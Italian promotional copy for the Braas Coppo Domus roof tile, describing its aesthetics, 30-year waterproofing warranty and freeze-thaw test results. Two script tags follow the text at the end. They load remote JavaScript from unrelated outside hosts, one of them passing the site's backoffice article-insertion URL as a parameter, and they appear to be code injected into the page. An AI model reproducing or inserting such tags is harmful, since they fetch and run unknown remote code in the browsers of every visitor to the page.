Coppo Domus è la tegola che, più di ogni altra, testimonia l’elevato livello qualitativo raggiunto da Braas. Nota ed apprezzata per l’estetica raffinata, sembra realizzata a mano, artigianalmente, una ad una, come i coppi antichi.
Colorazioni sapientemente ispirate al paesaggio italiano, alla sua campagna, ai suoi borghi medievali, al suo inconfondibile stile mediterraneo ne esaltano la forma e il profilo consentendo di creare coperture uniche, suggestive e personalizzate.
Oggi, dopo anni di approfonditi studi e specifici test, Braas ha raggiunto un nuovo traguardo: una garanzia di 30 anni ottenuta a seguito di ingenti investimenti in ricerca e sviluppo e all’accurata selezione delle argille in grado assicurare le migliori performance funzionali.
La Garanzia si applica alla tegola Coppo Domus prodotta nello stabilimento di Castelletto di Branduzzo, in provincia di Pavia e garantisce il rispetto del requisito di impermeabilità della tegola per 30 anni. Per conseguire questo brillante risultato sono stati eseguiti numerosi test in laboratori differenti a garanzia dell’affidabilità e replicabilità delle prove, mentre controlli specifici hanno riguardato il processo di produzione al fine di assicurare il rispetto di nuovi e più stringenti parametri di riferimento.
A riprova dell’elevato livello qualitativo raggiunto da Braas, tutte le tegole sono sottoposte – per procedura standard – ad almeno 400 cicli di gelo/disgelo, al fine di assicurarne la resistenza, anche nei climi più freddi.
Un valore che supera ampiamente il limite richiesto dalla normativa in vigore (UNI EN 1304), pari a 90 cicli per l'Italia e 150 cicli per i paesi del Nord Europa. Scegliendo Coppo Domus, rivenditori, imprese e clienti finali dimostrano non solo di prediligere la tegola di maggior pregio per estetica e funzionalità della gamma Braas, ma beneficiano di una sicurezza in più: la certezza di una tegola di qualità superiore, garantita 30 anni prodotta da un’azienda leader di mercato sempre presente e al servizio dei propri clienti.
<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>